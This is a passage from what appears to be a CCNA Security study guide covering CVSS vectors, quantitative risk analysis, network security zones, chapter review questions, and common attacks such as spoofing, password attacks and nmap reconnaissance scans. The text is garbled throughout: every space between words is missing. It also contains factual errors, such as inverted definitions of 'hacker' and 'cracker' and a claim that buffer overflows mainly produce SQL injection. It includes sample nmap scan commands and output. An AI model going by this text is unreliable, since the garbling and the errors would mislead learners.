PstandsforPartialandmeanssomeaccesstoinformationwouldoccur.
CstandsforCompleteandmeansallinformationonthesystemcouldbecompromised.
Integrity(I)describesthetypeofdataalterationthatmightoccurandhasthreepossiblevalues.
NstandsforNoneandmeansthatthereisnointegrityimpact.
PstandsforPartialandmeanssomeinformationmodificationwouldoccur.
CstandsforCompleteandmeansallinformationonthesystemcouldbecompromised.
TheCVSSvectorwilllooksomethinglikethis:
CVSS2#AV:L/AC:H/Au:M/C:P/I:N/A:N
Thisvectorisreadasfollows:
AV:L
AccessVector:LstandsforLocalandmeansthattheattackermusthavephysicalorlogicalaccesstotheaffectedsystem.
AC:H
AccessComplexity:HstandsforstandsforHighandmeansthatthevulnerabilityrequiresspecialconditionsthatarehardtofind.
Au:M
Authentication:MstandsforMultipleandmeansthattheattackerwouldneedtogetthroughtwoormoreauthenticationmechanisms.
C:P
Confidentiality:PstandsforPartialandmeanssomeaccesstoinformationwouldoccur.
I:N
Integrity:NstandsforNoneandmeansthatthereisnointegrityimpact.
A:N
Availability:NstandsforNoneandmeansthatthereisnoavailabilityimpact.
ControlSelectionOncetheassetshavebeenclassifiedandtheirvaluedeterminedandallvulnerabilitieshavebeenidentified,controlsormitigationsmustbeselectedtoaddressthevulnerabilities.Thiscannotbedoneuntilthelevelofriskassociatedwitheachvulnerabilityhasbeendetermined
throughoneoftwomethods,qualitativeandquantitativeriskassessment.
QualitativeRiskAnalysisQualitativeriskanalysisdoesnotassignmonetaryandnumericvaluestoallfacetsoftheriskanalysisprocess.Qualitativeriskanalysistechniquesincludeintuition,experience,andbest-practicetechniques,suchasbrainstorming,focusgroups,surveys,questionnaires,meetings,interviews,andDelphi.Althoughallofthesetechniquescanbeused,mostorganizationswilldeterminethebesttechnique(ortechniques)basedonthethreatstobeassessed.Experienceandeducationonthethreatsareneeded.
Eachmemberofthegroupwhohasbeenchosentoparticipateinthequalitativeriskanalysisusestheirexperiencetorankthelikelihoodofeachthreatandthedamagethatmightresult.Aftereachgroupmemberranksthethreatpossibility,losspotential,andsafeguardadvantage,dataiscombinedinareporttopresenttomanagement.Alllevelsofstaffshouldberepresentedaspartofthequalitativeriskanalysis,butitisvitalthatsomeparticipantsinthisprocessshouldhavesomeexpertiseinriskanalysis.
QuantitativeRiskAnalysisAquantitativeriskanalysisassignsmonetaryandnumericvaluestoallfacetsoftheriskanalysisprocess,includingassetvalue,threatfrequency,vulnerabilityseverity,impact,safeguardcosts,andsoon.Equationsareusedtodeterminetotalandresidualrisks.Themostcommonequationsareforsinglelossexpectancy(SLE)andannuallossexpectancy(ALE).
TheSLEisthemonetaryimpactofeachthreatoccurrence.TodeterminetheSLE,youmustknowtheassetvalue(AV)andtheexposurefactor(EF).TheEFisthepercentvalueorfunctionalityofanassetthatwillbelostwhenathreateventoccurs.ThecalculationforobtainingtheSLEisasfollows:
SLE=AV×EF
Forexample,anorganizationhasawebserverfarmwithanAVof$10,000.Iftheriskassessmenthasdeterminedthatapowerfailureisathreatagentforthewebserverfarmandtheexposurefactorforapowerfailureis25percent,theSLEforthiseventequals$2,500.
Theannuallossexpectancy(ALE)istheexpectedriskfactorofanannualthreatevent.TodeterminetheALE,youmustknowtheSLEandtheannualizedrateofoccurrence(ARO).TheAROistheestimateofhowoftenagiventhreatmightoccurannually.ThecalculationforobtainingtheALEisasfollows:
ALE=SLE×ARO
Usingthepreviouslymentionedexample,iftheriskassessmenthasdeterminedthattheAROforthepowerfailureofthewebserverfarmis50percent,theALEforthiseventequals$1,250.
Cost-BenefitAnalysis
UsingtheALE,theorganizationcandecidewhethertoimplementcontrols.IftheannualcostofthecontroltoprotectthewebserverfarmismorethantheALE,theorganizationcouldeasilychoosetoaccepttheriskbynotimplementingthecontrol.IftheannualcostofthecontroltoprotectthewebserverfarmislessthantheALE,theorganizationshouldconsiderimplementingthecontrol.
HandlingRiskRiskreductionistheprocessofalteringelementsoftheorganizationinresponsetoriskanalysis.Afteranorganizationunderstandsitstotalandresidualrisk,itmustdeterminehowtohandletherisk.Thefollowingfourbasicmethodsareusedtohandlerisk:
AvoidanceTerminatingtheactivitythatcausesariskorchoosinganalternativethatisnotasrisky
TransferPassingtheriskontoathirdparty,includinginsurancecompanies
MitigationDefiningtheacceptableriskleveltheorganizationcantolerateandreducingtherisktothatlevel
AcceptanceUnderstandingandacceptingthelevelofriskaswellasthecostofdamagesthatcanoccur
NetworkTopologiesUnderstandingthetypesofnetworktopologiesthatyoumayseewillhelpyouappreciatesomeofthesecuritymeasurescalledforinvariousscenarios.Inthissection,you’lllearnaboutsometopologiesthatmayexistinyourorganization.
CANThecampusareanetwork(CAN)comprisesthepartofthenetworkwheredata,services,andconnectivitytotheoutsideworldareprovidedtothosewhoworkinthecorporateofficeorheadquarters.Itcanbefurthersubdividedintothefollowing:
Enterprisecoreconnectstheenterprisecampusandtheintranetdatacenter.
Enterprisecampusincludestheenddevicesandprovidesthemaccesstotheoutsideworldandtotheintranetdatacenterthroughtheenterprisecore.
Intranetdatacenterincludesthedatacenterwhereresourcesaremadeavailabletotheenterprisecampusandtobranchofficesthoughtheenterprisecore.
Figure1.3showsthecomponentsoftheCAN.Itincludestwopartsthatarenotpartoftheenterprisecampus(WANedgeandInternetedge)thatcomprisethenetworksthatareusedtoconnecttotheoutsideworld.
FIGURE1.3Campusareanetwork
Securityissuesintheenterprisecoreincludethefollowing:
Servicedisruptions(denialofservice[DoS],distributeddenialofservice[DDoS])
Unauthorizedaccess(intrusions,routingprotocolattacks)
Dataleaksanddatamodifications(packetsniffing,maninthemiddle[MITM]attacks)
Securityissuesintheenterprisecampusincludethefollowing:
Servicedisruptions(botnets,malware,DoS)
Unauthorizedaccess(intrusions,IPspoofing)
Dataleaksanddatamodifications(packetsniffing,MiTMattacks)
Identifytheftandfraud(phishing,emailspam)
Securityissuesintheintranetdatacenterincludethefollowing:
Unauthorizedaccess(deviceaccess,dataaccess,privilegeescalation)
Servicedisruptions(botnets,DoS)
Dataleaksanddatamodifications(MITM,malware,scripting,SQLattacks)
WANTheWANconnectionoftheorganizationiscalledtheenterpriseWANedgeintheCisconetworkmodel.ItisoneoftwomodulesthatareusedtoconnecttheCANtotheoutsideworld,theotherbeingtheenterpriseInternetedge(showninFigure1.3).ThiscomprisestheprovisionedWANconnectionstootheroffices.
SecurityissuesintheenterpriseWANedgeincludethefollowing:
Maliciousbranchclientactivity(malware,Trojans,botnets)
Transmissionthreats(MITM,sniffing)
Infrastructureattacks(reconnaissance,DoS,serviceattacks)
DataCenterWhilethedatacentermaybelocatedinthecampusareanetwork,itmayalsobelocatedinthecloud.Theintroductionsofcloudenvironmentsbringmanybenefits,buttheyalsobringsecuritythreats.Thesethreatsincludethefollowing:
Accountorservicehijacking
Dataloss
Improperdevicehardeningandpatching
DoSattacks
InsecureAPIsanduserinterfaces
Maliciousproviderinsiders
Improperaccessfromothertenants
SOHOManyoftoday’sworkersoperatefromhomeratherthaninthemainofficeorheadquarters.Otheruserswillbeoperatingfromsmallerbranchoffices.Whenthisisthecase,thesmalloffice/homeoffice(SOHO)networkwillconnecttothemainofficeviatheWANedgemoduleincaseswheretheconnectionisprovisionedandviatheInternetedgemodulewhentheconnectionleveragestheInternet(suchasaVPNconnection).ThesetwoedgemoduleswereshowninFigure1.3.Sincethismoduleinterfaceswiththosetwomodules,thesecurityissuesintheSOHOnetworkwillbethesameasthosepresentintheInternetedgeandWANedgemodules.
VirtualToday’sdatacentersareincreasinglymovingtoavirtualenvironment.Whenavirtualenvironmentispresent,itmayresideinthecampusdatacenter,oritmayresideinaclouddatacenter.Also,itisnotunusualtofindthattheorganizationhasbothaphysicaldatacenterandavirtualdatacenter.Regardlessoftheexactconfiguration,therearechallengestosecuringavirtualenvironment.
Inavirtualenvironmenttherearetwotrafficpathways,onethatisusedwithinthevirtualenvironmentandoneusedbetweenthevirtualenvironmentandthephysicalenvironment.Physicalsecuritydevicescannotbeusedtoenforcesecurityonthetrafficthatneverleavesaphysicalhost(trafficbetweenVMslocatedonthesamehost)orontrafficthatneverleavesthevirtualenvironment(trafficbetweenVMsondifferenthosts).ThesolutionisthedeploymentofvirtualsecuritydevicessuchastheCiscoASAvfirewall,theCiscoCSR1000vrouter,andtheCiscoNexus1000vswitch.
CommonNetworkSecurityZones
Oneofthemostbasicdesignprinciplesforasecurenetworkcallsforcreatingsecurityzones.Thesearelogicaldivisionsofthenetworkwithaccesscontrolsappliedtocontroltrafficbetweenthezones.Byorganizingresourcesinthesezonesandapplyingtheproperaccesscontrols,youcanreducethepossibilitythatunauthorizedaccesstodataisallowed.Inthissection,you’llexplorefourcommonsecurityzones.
DMZAdemilitarizedzone(DMZ)isanareawhereyoucanplaceapublicserverforaccessbypeopleyoumightnottrustotherwise.ByisolatingaserverinaDMZ,youcanhideorremoveaccesstootherareasofyournetwork.Youcanstillaccesstheserverusingyournetwork,butothersaren’tabletoaccessfurthernetworkresources.Thiscanbeaccomplishedusingfirewallstoisolateyournetwork.
WhenestablishingaDMZ,youassumethatthepersonaccessingtheresourceisn’tnecessarilysomeoneyouwouldtrustwithotherinformation.Bykeepingtherestofthenetworkfrombeingvisibletoexternalusers,thislowersthethreatofintrusionintheinternalnetwork.
Anytimeyouwanttoseparatepublicinformationfromprivateinformation,a
DMZisanacceptableoption.
TheeasiestwaytocreateaDMZistouseafirewallthatcantransmitinthesethreedirections:
Totheinternalnetwork
Totheexternalworld(Internet)
Tothepublicinformationyou’resharing(theDMZ)
Fromthere,youcandecidewhattrafficgoeswhere;forexample,HTTPtrafficwouldbesenttotheDMZ,andemailwouldgototheinternalnetwork.
IntranetandExtranetWhileDMZsareoftenusedtomakeassetspubliclyavailable,extranetsareusedtomakedataavailabletoasmallersetofthepublic—forexample,apartnerorganization.IntranetisatermtodescribetheinteriorLAN;anextranetisanetworklogicallyseparatefromtheintranet,theInternet,andtheDMZ(ifbothexistinthedesign),whereresourcesthatwillbeaccessedfromtheoutsideworldaremadeavailable.Accessmaybegrantedtocustomers,businesspartners,andthepublicingeneral.Alltrafficbetweenthisnetworkandtheintranetshouldbecloselymonitoredandsecurelycontrolled.Nothingofasensitivenatureshouldbeplacedintheextranet.
PublicandPrivate
ThepurposeofcreatingsecurityzonessuchasDMZsistoseparatesensitiveassetsfromthosethatrequirelessprotection.Becausethegoalsofsecurityandofperformanceandeaseofusearetypicallymutuallyexclusive,notallnetworksshouldhavethesamelevelsofsecurity.
Informationthatisofapublicnature,orthatyouotherwisedeemnottobeofasensitivenature,canbelocatedinanyofthezonesyoucreate.However,youshouldensurethatprivatecorporatedataandespeciallypersonallyidentifiableinformation(PII)—informationthatcanbeusedtoidentifyanemployeeorcustomerandperhapsstealtheiridentity—islocatedonlyinsecurezonesandneverintheDMZortheextranet.
VLANNetworksecurityzonescanalsobecreatedatlayer2.Virtuallocalareanetworks(VLANs)arelogicalsubdivisionsofaswitchthatsegregateportsfromoneanotherasiftheywereindifferentLANs.VLANsofferanotherwaytoaddalayerofseparationbetweensensitivedevicesandtherestofthenetwork.Forexample,ifonlyonedeviceshouldbeabletoconnecttothefinanceserver,thedeviceandthefinanceservercouldbeplacedinaVLANseparatefromtheotherVLANs.AstrafficbetweenVLANscanoccuronlythrougharouter,ACLscanbeusedtocontrolthetrafficallowedbetweenVLANs.
TheseVLANscanalsospanmultipleswitches,meaningthatdevicesconnectedtoswitchesindifferentpartsofanetworkcanbeplacedinthesameVLANregardlessofphysicallocation.
SummaryThischaptercoveredcommonsecurityprinciplessuchastheCIAtriad,thegoalsofwhichshouldguideallsecurityinitiatives.Italsodiscussedcommonsecuritytermssuchasrisk,vulnerability,andthreat,aswellastheproperapplicationofcommonsecurityzones,suchasIntranet,DMZ,andextranets.ThischapteralsodiscussednetworktopologiesasseenfromtheperspectiveoftheCiscocampusareanetwork.Finally,thechapterdiscussedothermethodsofnetworksegmentationsuchasVLANs.
ExamEssentialsDescribetheCIAtriad.Everysecuritymeasureyouimplementshouldcontributetotheachievementofoneofthreegoals.Thethreefundamentalsofsecurityareconfidentiality,integrity,andavailability(CIA),oftenreferredtoastheCIAtriad.
Defineimportantsecurityterms.Securityprofessionalsshouldbecomefamiliarwithtermssuchasassets,vulnerabilities,threats,threatagent,risk,exposure,andcountermeasures.
Identifycommonsecurityzones.Describeintranet,extranet,DMZ,andtheInternet.Explaintheirproperuse.
Describecommonnetworktopologies.ExplainvarioustopologiesasseenfromtheperspectiveoftheCiscocampusareanetworksuchastheenterprisecore,enterprisecampus,
intranetdatacenter,WANedge,andintranetedge.Describethecommonsecurityissuesfoundineach.
ReviewQuestions1. WhichofthefollowingisnotoneoftheCIAtriad?
A. Confidentiality
B. Integrity
C. Availability
D. Accountability
2. Whichofthefollowingrequiresthatauserorprocessisgivenonlytheminimumaccessprivilegeneededtoperformaparticulartask?
A. Leastprivilege
B. Separationofduties
C. Jobrotation
D. Mandatoryvacation
3. Whichofthefollowingoccurswhenavulnerabilityisidentifiedorexploited?
A. Risk
B. Threat
C. Exposure
D. Countermeasure
4. AccordingtoNISTSP800-30,whatisthefirststepintheriskmanagementprocess?
A. Identifythreats
B. Identifyimpact
C. Identifyvulnerabilities
D. Identifytheassetsandtheirvalue
5. Whichofthefollowingisameasureofhowfreelydatacanbehandled?
A. Criticality
B. Sensitivity
C. Integrity
D. Value
6. Whichofthefollowingisnotatypicalcommercialdataclassificationlevel?
A. Sensitive
B. Confidential
C. Secret
D. Public
7. WhichofthefollowingrepresentsdatasharedonlywithinameetingintheTLPsystem?
A. Amber
B. White
C. Red
D. Green
8. Whichofthefollowingisastandardusedbythesecurityautomationcommunityusedtoenumeratesoftwareflawsandconfigurationissues?
A. TLP
B. CIA
C. SCAP
D. CAN
9. WhichofthefollowingisnotametricgroupintheCommonVulnerabilityScoringSystem?
A. Base
B. Accessvector
C. Temporal
D. Environmental
10. Whichofthefollowingisthemonetaryimpactofeachthreatoccurrence?
A. ALE
B. AV
C. ARO
D. SLE
11. Whichmethodofhandlingriskinvolvesdefiningtheacceptableriskleveltheorganizationcantolerateandreducingtherisktothatlevel?
A. Avoidance
B. Mitigation
C. Acceptance
D. Transfer
12. WhatpartofthecampusareanetworkincludestheenddevicesandprovidesthemwithaccesstotheoutsideworldandtotheIntranetdatacenterthroughtheenterprisecore?
A. Intranetdatacenter
B. Enterprisecampus
C. Enterprisecore
D. EnterpriseWANedge
13. Whichofthefollowingisanareawhereyoucanplaceapublicserverforaccessbyanyone?
A. Intranet
B. DMZ
C. Internet
D. Extranet
14. Whichofthefollowingisalogicalsubdivisionofaswitchthatsegregatesportsfromoneanother?
A. VLAN
B. VPN
C. DMZ
D. STP
15. Whichofthefollowingreferstothedatabeingunalteredbyunauthorizedindividuals?
A. Confidentiality
B. Integrity
C. Availability
D. Accountability
16. Whichofthefollowingreferstothepracticeofusingmultiplelayersofsecuritybetweendataandtheresourcesonwhichitresidesandpossibleattackers?
A. Defaulttonoaccess
B. Defenseindepth
C. Separationofduties
D. Jobrotation
17. Whichofthefollowingistheprobabilitythatathreatagentwillexploitavulnerabilityandtheimpactifthethreatiscarriedout?
A. Risk
B. Threat
C. Exposure
D. Countermeasure
18. Whichofthefollowingisasystemthatusestrafficlightcolorstoclassifyinformationassets?
A. DLP
B. VLAN
C. TLP
D. VTP
19. WhichcomponentofSCAPreferstovulnerabilitiesinpublishedoperatingsystemsandapplicationssoftware?
A. CWE
B. CVE
C. CCE
D. CPE
20. Whichofthefollowingisthepercentvalueorfunctionalityofanassetthatwillbelostwhenathreateventoccurs?
A. SLE
B. AV
C. EF
D. ALE
Chapter2UnderstandingSecurityThreatsCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
1.2Commonsecuritythreats
Identifycommonnetworkattacks
Describesocialengineering
Identifymalware
Classifythevectorsofdataloss/exfiltration
Tosecureanetwork,youmusthaveaclearunderstandingofthethreatsthatthenetworkfaces.Thesethreatscomefromallsortsofsourcesandhaveavarietyofgoals.Inthischapter,youwillcontinueyourinvestigationofcommonsecuritythreatsandtheirassociatedthreatvectors.
Inthischapter,youwilllearnthefollowing:
Commonsecuritythreats
CommonNetworkAttacksWhilenewattacksandnewmotivationsforthoseattacksseemtobearrivingalmostdaily,therearesomecommonattacksandcommonmotivationsforthoseattacks.Inthischapter,you’llfirstlearnaboutcommonmotivationsforattacksandcommonattackvectorsthataresimplyvariouswaysinwhichtheattacksareimplemented.Followingthat,you’lllearnaboutsomespecificattacksthatarequitecommon.
MotivationsHackershackformanydifferentreasons.Whenyoureallygetdowntoit,theywantoneoffourthings:
Financialgain
Disruption
Geopoliticalchange
Notoriety
TheFederalBureauofInvestigation(FBI)hasidentifiedthreecategoriesofthreatactors.
Organizedcrimegroupsprimarilythreateningthefinancialservicessectorandexpandingthescopeoftheirattacks
Statesponsors,usuallyforeigngovernments,interestedinpilferingdata,includingintellectualpropertyandresearchanddevelopmentdatafrommajormanufacturers,governmentagencies,anddefensecontractors
TerroristgroupsthatwanttoimpactcountriesbyusingtheInternetandothernetworkstodisruptorharmtheviabilityofourwayoflifebydamagingourcriticalinfrastructure
Whilethereareotherlessorganizedgroupsoutthere,thesethreegroupsareconsideredtobetheprimarythreatactorsbylawenforcement.However,organizationsshouldnottotallydisregardthethreatofanythreatactorsthatfalloutsidethesethreecategories.Loneactorsorsmallergroupsthatusehackingasameanstodiscoverandexploitanydiscoveredvulnerabilitycancausedamagejustlikethelarger,moreorganizedgroups.
HacktivistsThisincludesthosewhohacknotforpersonalgainbuttofurtheracause.AnexampleistheAnonymousgroupthathacksfromtimetotimeforvariouspoliticalreasons.
ThrillhackersTheseguysdoitforthenotoriety.Theydefacewebsitesandbragabouttheirconqueststotheirfellowthrillhackersonwebsiteswheretheysharetoolsandmethods.
Hackerandcrackeraretwotermsthatareoftenusedinterchangeablyinmediabutdonotactuallyhavethesamemeaning.Hackersareindividualswhoattempttobreakintosecuresystemstoobtainknowledgeaboutthesystemsandpossiblyusethatknowledgetocarryoutpranksorcommitcrimes.Crackers,ontheotherhand,areindividualswhoattempttobreakintosecuresystemswithoutusingtheknowledgegainedforanynefariouspurposes.
Inthesecurityworld,thetermswhitehat,grayhat,andblackhataremoreeasilyunderstoodandlessoftenconfusedthanthetermshackersandcrackers.Awhitehatdoesnothaveanymaliciousintent.Ablackhathasmaliciousintent.Agrayhatisconsideredsomewhereinthemiddleofthetwo.Agrayhatwillbreakintoasystem,notifytheadministratorofthesecurityhole,andoffertofixthesecurityissuesforafee.
ClassifyingAttackVectorsAfterassetshavebeenclassifiedwithregardtosensitivityandcriticality(seeChapter1),thenextstepistoidentifythreats.Whendeterminingvulnerabilitiesandthreatstoanasset,consideringthethreatagentsfirstisofteneasiest.Threatagentscanbegroupedintothefollowingsixcategories:
Humanincludesbothmaliciousandnonmaliciousinsidersandoutsiders,terrorists,spies,andterminatedpersonnel.
Naturalincludesfloods,fires,tornadoes,hurricanes,earthquakes,orothernaturaldisasterorweatherevent.
Technicalincludeshardwareandsoftwarefailure,maliciouscode,andnewtechnologies.
PhysicalincludesCCTVissues,perimetermeasuresfailure,andbiometricfailure.
OperationalincludesanyprocessorprocedurethatcanaffectCIA.
Examplesofthethreatactorsincludebothinternalandexternalactorsandincludethefollowing:
Internalactors
Recklessemployee
Untrainedemployee
Partner
Disgruntledemployee
Internalspy
Governmentspy
Vendor
Thief
Externalactors
Anarchist
Competitor
Corruptgovernmentofficial
Dataminer
Governmentcyberwarrior
Irrationalindividual
Legaladversary
Mobster
Activist
Terrorist
Vandal
SpoofingSpoofing,alsoreferredtoasmasquerading,occurswhencommunicationfromanattackerappearstocomefromtrustedsources.Thegoalofthistypeofattackistoobtainaccessby
pretendingtobethattrustedsource.Spoofingcanbeattemptedbasedonthefollowing:
IPaddresses
MACaddresses
Emailaddressees
Let’slookateachoneofthesetypesofspoofing.
IPAddressSpoofingIPaddressspoofingisoneofthetechniquesusedbyhackerstohidetheirtrailortomasqueradeasanothercomputer.ThehackeralterstheIPaddressasitappearsinthepacket.ThiscansometimesallowthepackettogetthroughanACLthatisbasedonIPaddresses.ItalsocanbeusedtomakeaconnectiontoasystemthattrustsonlycertainIPaddressesorrangesofIPaddresses.
MACAddressSpoofingMACaddressescanalsobespoofedandusedtogetthroughMACaddressfilters.Thesefiltersaretypicallyappliedtocontrolaccesstowirelessaccesspointsatlayer2.Theycanalsobeusedtoimpersonateanotherdeviceconnectedtothesameswitch.Inthatscenario,itenablestheimpersonatingdevicetoreceivetrafficintendedforthelegitimatedevice.InChapters4and5youwilllearnaboutmethodstopreventtheseswitch-basedattacks.
EmailSpoofingEmailspoofingistheprocessofsendinganemailthatappearstocomefromonesourcewhenitreallycomesfromanother.ItismadepossiblebyalteringthefieldsofemailheaderssuchasFrom,ReturnPath,andReply-to.Itspurposeistoconvincethereceivertotrustthemessageandreplytoitwithsomesensitiveinformationthatthereceiverwouldnothavesharedunlessitwasatrustedmessage.
Oftenthisisonestepinanattackdesignedtoharvestusernamesandpasswordsforbankingorfinancialsites.Thisattackcanbemitigatedinseveralways.OneisSMTPauthentication,which,whenenabled,disallowsthesendingofanemailbyauserwhocannotauthenticatewiththesendingserver.
AnotherpossiblemitigationtechniqueistoimplementtheSenderPolicyFramework(SPF).SPFisanemailvalidationsystemthatworksbyusingDNStodeterminewhetheranemailsentbysomeonehasbeensentbyahostsanctionedbythatdomain’sadministrator.Ifitcan’tbevalidated,itisnotdeliveredtotherecipient’sbox.
PasswordAttacksApasswordattackisonethatattemptstodiscoveruserpasswords.Thetwomostpopularpasswordthreatsaredictionaryattacksandbrute-forceattacks.
Thebestcountermeasuresagainstpasswordthreatsaretoimplementcomplexpassword
policies,requireuserstochangepasswordsonaregularbasis,employaccountlockoutpolicies,encryptpasswordfiles,andusepassword-crackingtoolstodiscoverweakpasswords.
DictionaryAttackAdictionaryattackoccurswhenattackersuseadictionaryofcommonwordstodiscoverpasswords.Anautomatedprogramusesthehashofthedictionarywordandcomparesthishashvaluetoentriesinthesystempasswordfile.Althoughtheprogramcomeswithadictionary,attackersalsouseextradictionariesthatarefoundontheInternet.
Youshouldimplementasecurityrulethatsaysthatapasswordmustnotbeawordfoundinthedictionarytoprotectagainsttheseattacks.
Brute-ForceAttackBrute-forceattacksaremoredifficulttocarryoutbecausetheyworkthroughallpossiblecombinationsofnumbersandcharacters.Abrute-forceattackisalsoreferredtoasanexhaustiveattack.Itcarriesoutpasswordsearchesuntilacorrectpasswordisfound.Theseattacksarealsoverytime-consuming.
ReconnaissanceAttacksReconnaissanceattacksarecarriedouttogatherinformationabouttheorganizationalnetworkasapreludetoalargerattack.Itisalsosometimescalledfingerprintingthenetwork.Itisthefirststepthatapenetrationtesterwilltakebecauseitmimicsthefirststepofarealattacker.Thereareseveralwaysinwhichinformationcanbegatheredaboutthenetworktopology.Let’stakealookatthethreemostcommon.
PingScansPingscansinvolveidentifyingthelivehostsonanetworkorinadomainnamespace.Nmapandotherscanningtools(ScanLine,SuperScan)canbeusedforthis.Itrecordsresponsestopingssenttoeveryaddressinthenetwork.Itcanalsobecombinedwithaportscanbyusingtheproperargumentstothecommand.
Toexecutethisscanfromnmap,thecommandisnmap-sP192.168.0.0-100(0-100istherangeofIPaddressestobescannedinthe192.168.0.0network).Figure2.1showsanexampleoftheoutput.Alldevicesthatareonwillbelisted.ForeachtheMACaddresswillalsobelisted.
FIGURE2.1Pingscanwithnmap
PortScansAsoperatingsystemshavewell-knownvulnerabilities,sodocommonservices.Bydeterminingtheservicesthatarerunningonasystem,theattackeralsodiscoverspotentialvulnerabilitiesoftheserviceofwhichhemayattempttotakeadvantage.Thisistypicallydonewithportscansinwhichall“open”or“listening”portsareidentified.Onceagain,thelion’sshareoftheseissueswillhavebeenmitigatedwiththepropersecuritypatches,butthatisnotalwaysthecase,anditisnotuncommonforsecurityanalyststofindthatsystemsthatarerunningvulnerableservicesaremissingtherelevantsecuritypatches.Consequently,whenperformingservicediscovery,patchesshouldbecheckedonsystemsfoundtohaveopenports.Itisalsoadvisabletocloseanyportsnotrequiredforthesystemtodoitsjob.
Nmapisoneofthemostpopularportscanningtoolsusedtoday.Byperformingscanswithcertainflagssetinthescanpackets,securityanalysts(andhackers)canmakecertainassumptionsbasedontheresponsesreceived.TheseflagsareusedtocontroltheTCPconnectionprocess,sotheyarepresentonlyinthosepackets.Figure2.2showsaTCPheader.TheflagsofwhichIspeakarecircled.Normallytheflagsthatare“turnedon”willbedoneasaresultofthenormalTCPprocess,butahackercancraftpacketswiththeflagscheckedthatthehackerdesires.
FIGURE2.2TCPheader
Thesearetheflagsshown:
URG:Urgentpointerfieldsignificant
ACK:Acknowledgmentfieldsignificant
PSH:Pushfunction
RST:Resettheconnection
SYN:Synchronizesequencenumbers
FIN:Nomoredatafromsender
Byperformingscanswithcertainflagssetinthescanpackets,securityanalysts(andhackers)canmakecertainassumptionsbasedontheresponsesreceived
Nmapexploitsweaknesseswiththreescantypes.
ANULLscanisaseriesofTCPpacketsthatcontainasequencenumberof0andnosetflags.BecausetheNULLscandoesnotcontainanysetflags,itcansometimespenetratefirewallsandedgeroutersthatfilterincomingpacketswithparticularflags.Whenthispacketissent,theseresponsesarepossible:
Noresponse:Theportisopenonthetarget.
RST:Theportisclosedonthetarget.
Figure2.3showstheresultofthisscanusingthecommandnmap-sN.Inthiscase,nmapisunabletodeterminewhethertheportisopenorclosedbecausetherewasnoresponse,butyoudon’tknowiftheportisclosedorifthefirewallisblockingtheport.That’swhytheyarelistedasopen/filtered.
AFINscansetstheFINbitset.Whenthispacketissent,theseresponsesarepossible.
Noresponse:Theportisopenonthetarget.
RST/ACK:Theportisclosedonthetarget.
Thefollowingissampleoutputofthisscanusingthecommandnmap-sF.Iadded-vforverboseoutput.Again,inthiscase,nmapisunabletodeterminewhethertheportisopenorclosedbecausetherewasnoresponse,butyoudon’tknowiftheportisclosedorifthefirewallisblockingtheport.That’swhytheyarelistedasopen/filtered.
FIGURE2.3NULLscan
#nmap-sF-v192.168.0.7
Startingnmap3.81at2016-01-2321:17EDT
InitiatingFINScanagainst192.168.0.7[1663ports]at21:17
TheFINScantook1.51stoscan1663totalports.
Host192.168.0.7appearstobeup...good.
Interestingportson192.168.0.7:
(The1654portsscannedbutnotshownbelowareinstate:closed)
PORTSTATESERVICE
21/tcpopen|filteredftp
22/tcpopen|filteredssh
23/tcpopen|filteredtelnet
79/tcpopen|filteredfinger
110/tcpopen|filteredpop3
111/tcpopen|filteredrpcbind
514/tcpopen|filteredshell
886/tcpopen|filteredunknown
2049/tcpopen|filterednfs
MACAddress:00:03:47:6D:28:D7(Intel)
Nmapfinished:1IPaddress(1hostup)scannedin2.276seconds
Rawpacketssent:1674(66.9KB)|Rcvd:1655(76.1KB)
AnXMASscansetstheFIN,PSH,andURGflags.Whenthispacketissent,theseresponsesarepossible:
Noresponse:Theportisopenonthetarget.
RST:Theportisclosedonthetarget.
Figure2.4showstheresultofthisscanusingthecommandnmap-sX.Inthiscase,nmapisunabletodeterminewhethertheportisopenorclosedbecausetherewasnoresponse,butyoudon’tknowiftheportisclosedorifthefirewallisblockingtheport.That’swhytheyarelistedasopen/filtered.
FIGURE2.4XMASscan
Thesethreescans(NULL,FIN,andXMAS)allservethesamepurpose(todiscoveropenportsandportsblockedbyafirewall)anddifferonlyintheswitchused.Whiletherearemanymorescantypesandattacksthatcanbelaunchedwiththistool,thesescantypesarecommonlyusedduringenvironmentalreconnaissancetestingtodiscoverwhatthehackermightdiscoverbeforethehackerdoesandtakestepstocloseanygapsinsecurity.
OSFingerprintingOperatingsystemfingerprintingissimplytheprocessofusingsomemethodtodeterminetheoperatingsystemrunningonahostoraserver.ItsvaluetothehackeristhatbyidentifyingtheOSversionandbuildnumber,commonvulnerabilitiesofthatoperatingsystemcanbeidentifiedusingreadilyavailabledocumentationfromtheInternet.Whilemanyoftheissueswillhavebeenaddressedinsubsequentservicepacksandhotfixes,theremightbezero-dayweaknesses(thosethathavenotbeenwidelypublicizedoraddressedbythevendor)thehackermaybeabletoleverageintheattack.Moreover,ifanyoftherelevantsecuritypatcheshavenotbeenapplied,theweaknessesthepatchwasintendedtoaddresswillexistonthemachine.Therefore,thepurposeofattemptingOSfingerprintingduringassessmentistoassesstherelativeeasewithwhichitcanbedoneandidentifyingmethodstomakeitmoredifficult.
BufferOverflowBuffersareportionsofsystemmemorythatareusedtostoreinformation.Abufferoverflowisanattackthatoccurswhentheamountofdatathatissubmittedtodataislargerthanthebuffercanhandle.Typically,thistypeofattackispossiblebecauseofpoorlywrittenapplicationoroperatingsystemcode.Thiscanresultinaninjectionofmaliciouscode,primarilyeitheradenial-of-serviceattackoraSQLinjection.
Toprotectagainstthisissue,organizationsshouldensurethatalloperatingsystemsandapplicationsareupdatedwiththelatestservicepacksandpatches.Inaddition,programmersshouldproperlytestallapplicationstocheckforoverflowconditions.Hackerscantakeadvantageofthisphenomenonbysubmittingtoomuchdata,whichcancauseanerrororinsomecasesexecutecommandsonthemachineifthehackercanlocateanareawherecommandscanbeexecuted.Notallattacksaredesignedtoexecutecommands.AnattackmayjustlockthecomputerasinaDoSattack.
Withproperinputvalidation,abufferoverflowattackwillcauseanaccessviolation.Withoutproperinputvalidation,theallocatedspacewillbeexceeded,andthedataatthebottomofthememorystackwillbeoverwritten.Thekeytopreventingmanybufferoverflowattacksisinputvalidation,inwhichanyinputischeckedforformatandlengthbeforeitisused.Bufferoverflowsandboundaryerrors(wheninputexceedstheboundariesallottedfortheinput)areafamilyoferrorconditionscalledinputvalidationerrors.
DoSAdenial-of-service(DoS)attackoccurswhenattackersfloodadevicewithenoughrequeststodegradetheperformanceofthetargeteddevice.SomepopularDoSattacksincludeSYNfloods,pingsofdeath,andsmurfattacks.Let’sexplorehowtheseattackswork.
